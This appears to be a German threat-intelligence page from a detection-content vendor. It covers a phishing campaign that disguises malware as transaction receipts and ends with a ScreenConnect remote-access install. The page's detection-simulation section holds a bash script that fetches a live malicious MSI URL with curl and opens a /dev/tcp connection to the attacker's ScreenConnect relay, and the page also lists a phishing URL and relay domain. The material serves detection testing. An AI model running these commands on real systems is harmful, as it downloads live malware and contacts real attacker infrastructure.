SOC Prime Bias: High

19 Aug 2026 07:43 UTC

Malware-Phishing-Betrug: Phishing-E-Mails als Transaktionsquittungen getarnt

Author Photo
SOC Prime Team linkedin icon Folgen
Malware-Phishing-Betrug: Phishing-E-Mails als Transaktionsquittungen getarnt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure senden Phishing-E-Mails, die sich als Mitarbeiter von US-Unternehmen ausgeben und Anhänge enthalten, die als Transaktionsbelege getarnt sind. Der Angriff nutzt ein bösartiges PDF, um Benutzer dazu zu verleiten, ein vermeintliches Adobe Flash Player-Update herunterzuladen, das tatsächlich ein VBScript startet. Das Skript installiert dann das legitime ScreenConnect-Remote-Verwaltungstool, um einen persistierenden Fernzugriff für weiterführende Aktivitäten zu ermöglichen.

Untersuchung

Das AhnLab Security Intelligence Center (ASEC) identifizierte die Kampagne durch Untersuchung des Inhalts der Phishing-E-Mail und des Verhaltens des angehängten PDFs. Die Untersuchung verfolgte die Ausführungskette vom bösartigen VBScript bis zum Abrufen der Hintergrundnutzlast und der stillen Installation eines MSI-Pakets mit curl.exe and msiexec.exe.

Abschwächung

Benutzer sollten darin geschult werden, Phishing-Versuche zu erkennen, die unerwartete Transaktionsbelege und Aufforderungen zur Installation von Software-Updates wie Adobe Flash Player beinhalten. Organisationen sollten die Ausführung von VBScript einschränken und die unautorisierte Verwendung von Remote-Management-Tools einschließlich ScreenConnect überwachen. Anwendungsspezifische Zulassungslisten können auch helfen, die Ausführung unbekannter oder nicht zugelassener MSI-Pakete zu verhindern.

Reaktion

Wenn bösartige Aktivitäten erkannt werden, sollte das betroffene System sofort isoliert werden, um den Fernzugriff über ScreenConnect zu verhindern. Antwortgeber sollten aktive Sitzungen beenden, die mit relay.Gamedbd.Com -Infrastruktur verbunden sind, und das Register auf gespeicherte Sitzungsinformationen überprüfen. Eine vollständige forensische Untersuchung sollte auch klären, ob laterale Bewegungen oder Datenexfiltration über das Remote-Management-Tool stattgefunden haben.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

LOLBAS WScript / CScript (über process_creation)

SOC Prime Team
18. Aug 2026

Alternative Zugriffs- / Verwaltungssoftware (über process_creation)

SOC Prime Team
18. Aug 2026

Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (via Proxy)

SOC Prime Team
18. Aug 2026

Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (via DNS)

SOC Prime Team
18. Aug 2026

IOCs (HashMd5), um zu erkennen: Malware-Phishing/Betrug: Phishing-E-Mails, die sich als Transaktionsbelege tarnen

SOC Prime AI-Regeln
18. Aug 2026

Erkennung von Phishing-E-Mails, die sich als Transaktionsbelege tarnen [Proxy]

SOC Prime AI-Regeln
18. Aug 2026

Phishing-E-Mail, die sich als Transaktionsbeleg ausgibt und zur Installation des MSI-Pakets führt [Windows-Prozesserstellung]

SOC Prime AI-Regeln
18. Aug 2026

Ausführung der Simulation

Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifer-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und das Narrativ MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die vom Erkennungsskript erwartete Telemetrie zu erzeugen. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffsablauf & Befehle: Der Angreifer startet eine Phishing-Kampagne, indem er eine E-Mail zu einer fehlgeschlagenen Transaktion sendet. Der Link leitet das Opfer zu https://transaction-sucessful.vercel.app, welches einen gefälschten Beleg hostet. Wenn das Opfer auf „Beleg herunterladen“ klickt, versucht der Browser, https://payment-six-eta.vercel.app/doc/sc.msizu laden. Sobald die Nutzlast ausgeführt wird, versucht sie, eine Fernzugriffssitzung herzustellen, indem sie sich mit dem ScreenConnect-Relay bei relay.gamedbd.com:8041verbindet. Diese Sequenz testet sowohl die URL-basierte Erkennung als auch die Erkennung auf Basis von Domäne/Port.

  • Regressionstest-Skript:

    #!/bin/bash
    # Simulationsskript zur Auslösung der Phishing/ScreenConnect-Erkennungsregel
    
    echo "[+] Start der Simulation: Phishing/ScreenConnect Erkennungstest"
    
    # 1. Simulation des Downloads des bösartigen MSI von der Vercel-URL
    echo "[+] Schritt 1: Verbindung zur bösartigen Vercel-URL simulieren..."
    curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi"
    
    # 2. Simuliere die Verbindung zur spezifischen ScreenConnect-Relay-Domain/Port
    echo "[+] Schritt 2: Verbindung zum bösartigen ScreenConnect-Relay simulieren..."
    # Wir verwenden /dev/tcp, um einen Verbindungsversuch zu simulieren, ohne einen echten Listener zu benötigen
    timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null
    
    echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen."
  • Bereinigungsbefehle:

    # Dieses netzwerkbasierte Simulation erzeugt keine persistenten Artefakte.
    # Falls lokal Dateien heruntergeladen wurden, sollten diese entfernt werden:
    rm -f sc.msi
    echo "[+] Bereinigung abgeschlossen."